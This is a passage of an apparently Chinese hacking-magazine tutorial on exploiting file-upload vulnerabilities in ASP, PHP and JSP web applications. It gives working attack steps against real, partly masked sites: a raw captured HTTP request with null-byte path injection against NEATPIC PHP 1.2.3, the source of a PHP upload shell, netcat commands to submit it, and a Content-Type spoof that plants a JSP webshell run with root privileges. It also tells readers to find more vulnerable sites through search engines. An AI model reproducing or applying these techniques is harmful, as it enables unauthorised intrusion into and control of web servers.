<form method="POST" action="zs_save_add.asp" name="Form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<INPUT type="file" class="f11" name="file" size="33"title=上传产品图片资料不能大于200K。(要求:250×250像素)>
这里也有一点不同,File的第一个文本框中要输入file,“zs_save_add.asp”的确切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也没有出现“上传成功”的对话框!参数如下图10、11所示:
后门介绍:用的是血汉个人美化版!此木马功能非常多,可算是木马中的精典!第一:就算你得到了源代码也看不到明文的密码!第二:具有浏览,上传,下载,复制,删除,执行DOS命令,执行SQL命令,查看系统配置及nfso功能!
小提示:http://www.zr1*3.com/upload.asp?action=UpFile,以参数action=UpFile一定不能丢啊!!如图13所示,后门所在路径为:upload/other/test.asp
㈡:PHP上传漏洞篇:
测试程序:NEATPIC PHP目录直读版 1.2.3(开入了上传图片功能)
当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.
在百度里搜索“NEATPIC PHP目录直读版 1.2.3”你会找到很多装有此程序的站点!
第一步:用WsockExpert抓包
POST /index.php?action=upload HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://mycol.51*j.com/index.php?path=.
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d425237102f4
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: mycol.51*j.com
Content-Length: 982 //修改后为994,“/test.php%00”为12个字符
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=58894c5616b85eb6a93dcef949233176
-----------------------------7d425237102f4
Content-Disposition: form-data; name="path"
. //修改后为“./test.php%00”
-----------------------------7d425237102f4
Content-Disposition: form-data; name="image"; filename="D:\Hacktools\muma\upload.php"
//修改后为:"D:\Hacktools\muma\upload.gif"
Content-Type: text/plain
<?php
$action4="";
$remotefile="";
$localfile="";
if(isset($HTTP_POST_VARS['action4']))
{ $action4 = $HTTP_POST_VARS['action4'];
}if(isset($HTTP_POST_FILES['UpFile1']))
{ $remotefile = $HTTP_POST_FILES['UpFile1']['tmp_name'];
$localfile = $HTTP_POST_FILES['UpFile1']['name'];}
if($action4)
{ copy($remotefile,$localfile);
unlink($remotefile);
echo "upload file successfull";}
{?>
<form method="post" action="" enctype="multipart/form-data">
<input type=file name="UpFile1" value="" size=40><br>
<input type=hidden name="action4" value="upload"><br>
<input type=submit name="submit" value="Upload">
</form><?}?>
-----------------------------7d425237102f4--
第二步:修改
在“。”后面加上“/test.php%00”,为12字符,所以982要改成994,把cmd.php改成cmd.gif保存文件为test.txt后退出!
第三步:NC提交
nc –v www.mycol.5**j.com 80 <test.txt执行结果如图14
图14
在浏览器中输入:http://mycol.51*j.com/test.php我们的上传功能的SHELL出来了^_^如图15
图15
后门介绍:因为用NC上传时为保证成功率,所以自己编了一个仅能实现上传功能的短小木马;利用它你可以把安全天使angle写的一个经典PHP木马――phpspy上传上去!
㈢:JSP上传漏洞篇:
一天无意中进了一个
论坛,还是JSP编的来!注册一个用户后,在发表新文章里和修改个人资料里面均没有上传功能,然而在回复贴子时,有上传附件功能!于是在网上找了个JSP的SHELL(JSP网页木马3.0)上传后出现如图16错误:
图16
如果把“Content-Type: text/plain”改成“Content-Type: image/jpeg”能不能上传呢?用WsockExpert抓包,把数据存到记事本了,然后把“text/plain”改成“image/jpeg”存盘退出,用Nc提交:nc –v www.***.com 80 <jsp_UpFile.txt结果如图17:

图17
在浏览器里输入:_1096291342664.jsp?cmd=id">http://www.***.com/bbs/upload/image/4368_1096291342664.jsp?cmd=id如图18所示:

图18
哇噻!!还是ROOT权限来,让俺想起了范伟说的一句说:“大哥,甭说了,啥也不用说了”该怎么办自己看着为吧!
后门介绍:用的是JSP网页木马3.0;带一个参数CMD,如上图所示在“=”号后面加上要执行的命令就OK了!
目前,存在以上漏洞的系统还很多,利用此文章造成什么后果,与作者和黑防无关,特此声明!